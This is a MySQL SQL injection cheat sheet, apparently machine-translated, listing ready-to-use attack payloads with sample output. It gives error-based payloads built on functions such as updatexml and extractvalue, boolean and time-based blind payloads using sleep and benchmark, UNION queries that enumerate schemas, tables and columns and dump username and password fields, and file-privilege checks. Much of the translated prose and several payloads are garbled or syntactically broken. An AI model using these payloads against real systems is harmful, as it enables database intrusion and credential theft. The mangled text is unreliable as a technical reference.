MySQL injection mode

0x00– Error Injection
MySQL error injection, we sometimes encounter no normal data echo injection. At this point, we need to inject the error to get the data we need.


We used to have floor (), Updatexml (), Extractvalue () find some functions by finding the data.
Since these three are common, that is, in most MySQL versions, others may not be in the lower version.

Floor ()
Statement: and (select 1 from (SELECT COUNT (*), concat (version (), Floor (rand (0))) x from Information_schema.tables Group by x);

Mysql> Select 1 and (select 1 from (SELECT COUNT (*), concat (version (), Floor (Rand
(0) * *) x from Information_schema.tables Group by X) a);
ERROR 1062 (23000): Duplicate entry ' 5.5.401 ' for key ' Group_key '
Updatexml ()
Statement: and (Updatexml (1,concat (0x3a, (select User ())), 1));
Mysql> Select 1 and (Updatexml (1,concat (0x3a, (select User ())), 1);
Error 1105 (HY000): XPATH syntax error: ': [email protected] '
Extractvalue ()
Same as Upadtexml () usage
Statement: And Extractvalue (1, concat (0x5c, (select User ()));
Mysql> Select 1 and Extractvalue (1, concat (0x5c, (select User ()));
Error 1105 (HY000): XPATH syntax error: ' \[email protected] '
GeometryCollection () version> MySQL4.1
MultiPoint ()
Polygon ()
LineString ()
Multipolygon ()
MultiPoint ()
Multilinestring ()
These are the series of spatial extensions that MySQL introduced after the 4.1 release, enabling it to have a certain amount of space processing power.
Statements are the same example.
Statement: And GeometryCollection ((SELECT * FROM (select User () a) b));
Mysql> Select 1 and GeometryCollection ((SELECT * FROM (SELECT * from) (Select User (
)) (b));
ERROR 1367 (22007): illegal non geometric ' (select ' B '. ' User () ' from (select ' Ro
[email protected] ' as ' User () ' from dual) ' B ') ' value found during parsing
0x01– Blind Note
The blinds are divided into two types
One is the ordinary blind, one is based on time and called delay injection.
Through some processing functions, we need to get the data through the way of guessing.
Queries the database and ASCII (SUBSTRING (select schema_name from INFORMATION_SCHEMA. Schemata limit 0,1)) =ascii yards
Query user length and (select Length (user)) = 12;
Query database and ASCII (SUBSTR (Database (), number of bits, 1)) =ascii;
Query the user and 1= (if (ASCII () (User () from (bit) for (1)) = Query the ASCII encoding of a bit number character, 1,0));
Time Blind
In fact, the common blind plus the If judgment
And if (ASCII (User () from (number of digits) for (1)) =ascii Code, Sleep (3), 0)
and 1=if (ASCII (Mid (select User ()) from (1) for (1)) =114,sleep (3), 0);
and 1= (ASCII (Mid (User () from (bit) for (1)) =ASCII code) then benchmark (5*4000000,MD5 (1111)) Else 0 end) =1
and 1=if (Length (user ()) = Length, sleep (3), 0);
AAA ' XOR (if (User () from (bit) for (1)) = The ASCII encoding of the query bit number character, sleep (3), 0)) OR ' BBB
and Sleep (1-abs (lower (User ()) from (in digits) for (1)))) (-ASCII code))
No equals sign
The ASCII code of one character at a time, in contrast to the ASCII code in the list, takes the absolute value of the symbol.
If equal, the symbol is 0 and the absolute value is 0, which is deferred.
If not, the symbol is 1 or – 1, with an absolute value of 1, without delay.
Then we can get the data quickly through the py script.
0x02– Common MySQL injection statements
Querying the Database (mysql>5.0)
MySQL 5 above has built-in library information_schema, which stores all MySQL database and table structure information
and 1=2 Union select 1,2,3,schema_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. Schemata Limit 0,1
Guess table
and 1=2 Union select 1,2,3,table_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. TABLES where table_schema= database (hex) limit 0 (start record, 0 is the first start record), 1 (show 1 Records)
Guess Field
and 1=2 Union select 1,2,3,column_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. COLUMNS where table_name= table name (hex) Limit 0,1
Burst password
And 1=2 Union Select, user name segment, 5,6,7, password segment, 8,9 from table name limit 0,1
Advanced Usage (one available field displays two data content):
Union Select 1,2,3concat (user name segment, 0x3c, password segment), 5,6,7,8,9 from table name limit 0,1
System_user () system user name
User () Username
Current_User Current user Name
Session_user () User name of the connection database
Database () name
Version () MYSQL database versions
Load_file () MYSQL read local file function
@ @datadir Read database path
@ @basedir MYSQL Installation path
@ @version_compile_os Operating system Windows Server 2003
Determine if you have read and write permissions
and (select COUNT (*) from Mysql.user) >0/*
and (select COUNT (File_priv) from Mysql.user) >0/*

MySQL injection mode